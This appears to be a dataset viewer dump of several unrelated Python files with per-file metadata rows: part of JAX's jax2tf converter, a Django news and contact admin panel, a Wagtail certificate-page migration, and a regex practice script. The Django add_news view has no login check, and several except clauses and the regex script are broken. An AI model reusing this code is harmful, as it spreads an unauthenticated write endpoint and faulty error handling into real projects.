return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_jvp_call_jaxpr_p] = _custom_jvp_call_jaxpr
def _custom_vjp_call_jaxpr(*args: TfVal, fun_jaxpr: core.ClosedJaxpr,
**_) -> Sequence[TfVal]:
# TODO(necula): ensure that there is no AD transformation in scope
return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_vjp_call_jaxpr_p] = _custom_vjp_call_jaxpr
def _custom_lin(*args: TfVal, **_) -> Sequence[TfVal]:
raise TypeError("can't apply forward-mode autodiff (jvp) to a custom_vjp "
"function.")
tf_impl[ad.custom_lin_p] = _custom_lin
def split_to_logical_devices(tensor: TfVal,
partition_dimensions: pxla.PartitionsOrReplicated):
"""Like TPUMPStrategy.experimental_split_to_logical_devices.
For jax2tf purposes we want to avoid needing to thread the `strategy` object
through the generated computation. It seems that the original function needs
the strategy object only for error checking, which we assume is done upstream
by JAX.
Args:
tensor: Input tensor to annotate.
partition_dimensions: A list of integers, with one integer per tensor
dimension, specifying in how many parts the dimension should be split. The
product of integers must equal the number of devices per replica.
use_sharding_op: whether to use a sharding op, or not.
Returns:
an annotated tensor.
"""
# This corresponds to the sharding annotations in
# xla_bridge._sharding_to_proto.
if partition_dimensions is None:
return xla_sharding.replicate(tensor, use_sharding_op=True)
num_partition_splits = np.prod(partition_dimensions)
tile_assignment = np.arange(num_partition_splits).reshape(
partition_dimensions)
return xla_sharding.tile(tensor, tile_assignment, use_sharding_op=True)
def _sharded_call(f: lu.WrappedFun, vals: Sequence[TfVal],
in_parts: Sequence[pxla.PartitionsOrReplicated],
out_parts_thunk,
**_) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
sharded_vals = util.safe_map(split_to_logical_devices, vals, in_parts)
vals_out = f.call_wrapped(*sharded_vals) # caller handles new_sublevel
out_parts_flat = out_parts_thunk()
assert len(out_parts_flat) == len(
vals_out), f"expected {len(out_parts_flat)} == {len(vals_out)}"
sharded_vals_out = [
(split_to_logical_devices(val, val_part), val_aval)
for (val, val_aval), val_part in util.safe_zip(vals_out, out_parts_flat)
]
return sharded_vals_out
def _sharding_constraint(arg: TfVal, *,
partitions: pxla.PartitionsOrReplicated):
return split_to_logical_devices(arg, partitions)
tf_impl[sharded_jit.sharding_constraint_p] = _sharding_constraint
def _register_checkpoint_pytrees():
"""Registers TF custom container types as pytrees."""
m = tf.Module()
# The types here are automagically changed by TensorFlow's checkpointing
# infrastructure.
m.a = (tf.Module(), tf.Module())
m.b = [tf.Module(), tf.Module()]
m.c = {"a": tf.Module()}
tuple_wrapper = type(m.a)
list_wrapper = type(m.b)
dict_wrapper = type(m.c)
# TF AutoTrackable swaps container types out for wrappers.
assert tuple_wrapper is not tuple
assert list_wrapper is not list
assert dict_wrapper is not dict
jax.tree_util.register_pytree_node(tuple_wrapper, lambda xs:
(tuple(xs), None), lambda _, xs: tuple(xs))
jax.tree_util.register_pytree_node(list_wrapper, lambda xs: (tuple(xs), None),
lambda _, xs: list(xs))
jax.tree_util.register_pytree_node(
dict_wrapper, lambda s: (tuple(s.values()), tuple(s.keys())),
lambda k, xs: dict(zip(k, xs)))
_register_checkpoint_pytrees()
| 38.809375 | 133 | 0.704374 | [
"ECL-2.0",
"Apache-2.0"
] | ho-oto/jax | jax/experimental/jax2tf/jax2tf.py | 99,352 | Python |
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404, redirect
from django.template import loader
from django.http import HttpResponse
from django import template
from mainsite.forms import NewsCreate
from mainsite.models import News, ContactForm, Issue
@login_required(login_url="/admin-panel/login/")
def index(request):
context = {}
context['segment'] = 'index'
html_template = loader.get_template('index.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def profile(request):
context = {}
context['segment'] = 'profile'
html_template = loader.get_template('page-user.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def news(request):
list = News.objects.all()
context = {"list": list}
context['segment'] = 'news'
html_template = loader.get_template('news.html')
return HttpResponse(html_template.render(context, request))
def add_news(request):
upload = NewsCreate()
if request.method == 'POST':
upload = NewsCreate(request.POST, request.FILES)
if upload.is_valid():
upload.save()
return redirect('/admin-panel/news')
else:
return HttpResponse(
"""your form is wrong, reload on <a href = "{{ url : '/admin-panel/news'}}">reload</a>""")
else:
context = {
"upload_form": upload,
"action": "Добавить"
}
return render(request, 'add-news.html', context)
@login_required(login_url="/admin-panel/login/")
def update_news(request, news_id: int):
try:
news_sel = News.objects.get(pk=news_id)
except news.DoesNotExist:
return redirect('/admin-panel/news')
news_form = NewsCreate(request.POST, request.FILES or None, instance=news_sel)
if news_form.is_valid():
news_form.save()
return redirect('/admin-panel/news')
context = {
"ProductForm": news_form,
"ProductModel": news_sel,
"action": "Обновить"
}
return render(request, 'add-news.html', context)
@login_required(login_url="/admin-panel/login/")
def delete_news(request, news_id):
news_id = int(news_id)
try:
news_sel = News.objects.get(pk=news_id)
except news_id.DoesNotExist:
return redirect('/admin-panel/news')
news_sel.delete()
return redirect('/admin-panel/news')
@login_required(login_url="/admin-panel/login/")
def contactforms(request):
list = ContactForm.objects.all()
context = {"list": list}
context['segment'] = 'contactforms'
html_template = loader.get_template('contact-forms.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def requests(request):
list = Issue.objects.all()
context = {"list": list}
context['segment'] = 'requests'
html_template = loader.get_template('requests.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def delete_contact_form(request, contact_id):
contact_id = int(contact_id)
try:
contact_sel = ContactForm.objects.get(pk=contact_id)
except contact_id.DoesNotExist:
return redirect('/admin-panel/contacts')
contact_sel.delete()
return redirect('/admin-panel/contacts')
@login_required(login_url="/admin-panel/login/")
def pages(request):
context = {}
# All resource paths end in .html.
# Pick out the html file name from the url. And load that template.
try:
load_template = request.path.split('/')[-1]
context['segment'] = load_template
html_template = loader.get_template(load_template)
return HttpResponse(html_template.render(context, request))
except template.TemplateDoesNotExist:
html_template = loader.get_template('page-404.html')
return HttpResponse(html_template.render(context, request))
except:
html_template = loader.get_template('page-500.html')
return HttpResponse(html_template.render(context, request))
| 31.61194 | 106 | 0.684372 | [
"MIT"
] | Bekarysalashybayev/Nomad | app/views.py | 4,252 | Python |
# Generated by Django 2.2.3 on 2019-08-07 13:29
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.blocks
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
("wagtailimages", "0001_squashed_0021"),
("wagtailcore", "0041_group_collection_permissions_verbose_name_plural"),
("cms", "0040_whoshouldenrollpage_heading"),
]
operations = [
migrations.CreateModel(
name="CertificatePage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"product_name",
models.CharField(
help_text="Specify the course/program name.", max_length=250
),
),
(
"CEUs",
models.CharField(
blank=True,
help_text="Optional text field for CEU (continuing education unit).",
max_length=250,
null=True,
),
),
(
"signatories",
wagtail.core.fields.StreamField(
[
(
"signatory",
wagtail.core.blocks.PageChooserBlock(
page_type=["cms.SignatoryPage"], required=True
),
)
],
help_text="You can choose upto 5 signatories.",
),
),
],
options={"verbose_name": "Certificate"},
bases=("wagtailcore.page",),
),
migrations.CreateModel(
name="SignatoryIndexPage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
)
],
options={"abstract": False},
bases=("wagtailcore.page",),
),
migrations.CreateModel(
name="SignatoryPage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"name",
models.CharField(
help_text="Name of the signatory.", max_length=250
),
),
(
"title_1",
models.CharField(
blank=True,
help_text="Specify signatory first title in organization.",
max_length=250,
null=True,
),
),
(
"title_2",
models.CharField(
blank=True,
help_text="Specify signatory second title in organization.",
max_length=250,
null=True,
),
),
(
"organization",
models.CharField(
blank=True,
help_text="Specify the organization of signatory.",
max_length=250,
null=True,
),
),
(
"signature_image",
models.ForeignKey(
blank=True,
help_text="Signature image size must be at least 150x50 pixels.",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailimages.Image",
),
),
],
options={"verbose_name": "Signatory"},
bases=("wagtailcore.page",),
),
]
| 34.732877 | 93 | 0.374088 | [
"BSD-3-Clause"
] | kimdhamilton/mitxpro | cms/migrations/0041_certificatepage_signatoryindexpage_signatorypage.py | 5,071 | Python |
#!python3.6
#coding:utf-8
#regex.finditer(string[, pos[, endpos]])
import re
regex = re.compile(r'^ab')
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB', 'ABcd']:
print(target, regex.finditer(target))
print()
regex = re.compile(r'^ab', re.IGNORECASE)
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB', 'ABcd']:
print(target, regex.finditer(target))
print()
regex = re.compile(r'ab', re.IGNORECASE)
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB', 'ABcd']:
print(target, regex.finditer(target))
print()
regex = re.compile(r'ab', re.IGNORECASE)
print(regex)
pos = 2
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB']:
print(target, regex.finditer(target, pos, endpos=len(target)))
print()
regex = re.compile(r'ab', re.IGNORECASE)
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB']:
match = regex.finditer(target, pos, endpos=len(target))
print(target, match)
if match:
print(' match.expand():', match.expand('XY'))#AttributeError: 'list' object has no attribute 'expand'
print(' match.group():', match.group())
print(' match.groups():', match.groups())
print(' match.groupdict():', match.groupdict())
print(' match.start():', match.start())
print(' match.end():', match.end())
print(' match.span():', match.span())
print(' match.pos:', match.pos)
print(' match.endpos:', match.endpos)
print(' match.lastindex:', match.lastindex)
print(' match.lastgroup:', match.lastgroup)
print(' match.re:', match.re)
print(' match.string:', match.string)
| 34.142857 | 110 | 0.62642 | [
"CC0-1.0"
] | pylangstudy/201708 | 13/00/finditer.py | 1,673 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.